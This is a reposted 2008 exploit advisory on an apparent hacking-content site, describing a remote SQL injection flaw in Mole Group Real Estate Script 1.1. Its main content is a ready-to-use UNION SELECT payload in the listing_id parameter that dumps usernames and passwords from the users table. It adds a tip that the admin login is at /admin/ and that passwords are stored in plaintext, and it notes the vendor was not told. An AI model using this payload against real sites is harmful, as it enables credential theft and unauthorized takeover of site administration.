Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > Exploit > Content
Hot Articles
MyBulletinBoard (MyBB)
Joomla Component com_con
deV!Lz Clanportal [DZCP]
Discuz! 6.0.1 (searchid)
Boonex Dolphin 6.1.2 Mul
AuraCMS
pmaPWN! - phpMyAdmin Cod
SMF Mod Member Awards 1.
WarFTP 1.65 (USER) Remot
CMailServer 5.4.6 (CMail
VIVOTEK and NUUO Team Up
Mozilla Firefox 3.5 (Fon
OllyDBG v1.10 and ImpREC
Joomla Component com_con
BoonEx Ray 3.5 (sIncPath
Recommend Articles
Safari + Quicktime
CMailServer 5.4.6 (CMail
trixbox (langChoice) Loc
BrewBlogger 2.1.0.1 Arbi
Joomla Component com_con
Mole Group Last Minute S
BoonEx Ray 3.5 (sIncPath
Dreampics Builder (page)
Download Accelerator Plu
OllyDBG v1.10 and ImpREC
DreamNews Manager (id) R
gapicms 9.0.2 (dirDepth)
Million Pixels 3 (id_cat
Maian Cart 1.1 Insecure
Maian Music 1.0 Insecure
New Articles
ARM ifconfig eth0 and As
HP Data Protector Media
Winamp 5.5.8 (in_mod plu
Hanso Converter 1.1.0 .o
Fat Player Media Player
Comet Bird 3.6.10 Crash
PHP Hosting Directory 2.
MySQl 5.1 DLL Hijacking
Opera Denial of Service
Multiple Buffer Overflow
Postcard Mentor - Databa
Catalog Manager Database
My Vacation Tracker DLL
Microsoft Internet Explo
linux/x86 setreuid(0,0)
Mole Group Real Estate Script
  Add date: 07/24/2008   Publishing date: 07/24/2008   Hits: 1 
- [*] +================================================================================+ [*] -
- [*] +	       Real Estate Script <= 1.1 Remote SQL Injection Vulnerability	     + [*] -
- [*] +================================================================================+ [*] -



[*] Discovered By: t0pP8uZz
[*] Discovered On: 8 JULY 2008
[*] Script Download: http://www.mole-group.com/content/view/41/55/
[*] DORK: N/A



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION: 

	Real Estate Script from mole-group.com contains a insecure mysql query flaw, which 
	allows a remote attacker to execute arbitrary mysql querys and gaining access to confidential information.
	like username, passwords, email address's etc.

	see below for a example.



[*] SQL Injection:


	http://site.com/index.php?go=listings&listing_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONVERT(CONCAT(0x3C666F6E7420636F6C6F723D7265643E,username,0x3a,password,0x3C2F666F6E743E)/**/using/**/latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/FROM/**/users/**/LIMIT/**/0,1/*



[*] NOTE/TIP: 

	admin login is at /admin/
	passwords are in plaintext



[*] GREETZ: 

	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew!



[-] Peace…

	…t0pP8uZz!



- [*] +================================================================================+ [*] -
- [*] +	       Real Estate Script <= 1.1 Remote SQL Injection Vulnerability	     + [*] -
- [*] +================================================================================+ [*] -

# milw0rm.com [2008-07-08]
Prev:trixbox (langChoice) Local File Inclusion Exploit (connect-back) (2008-07-09) Next:BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

Comment:

Category: Home > Exploit
Home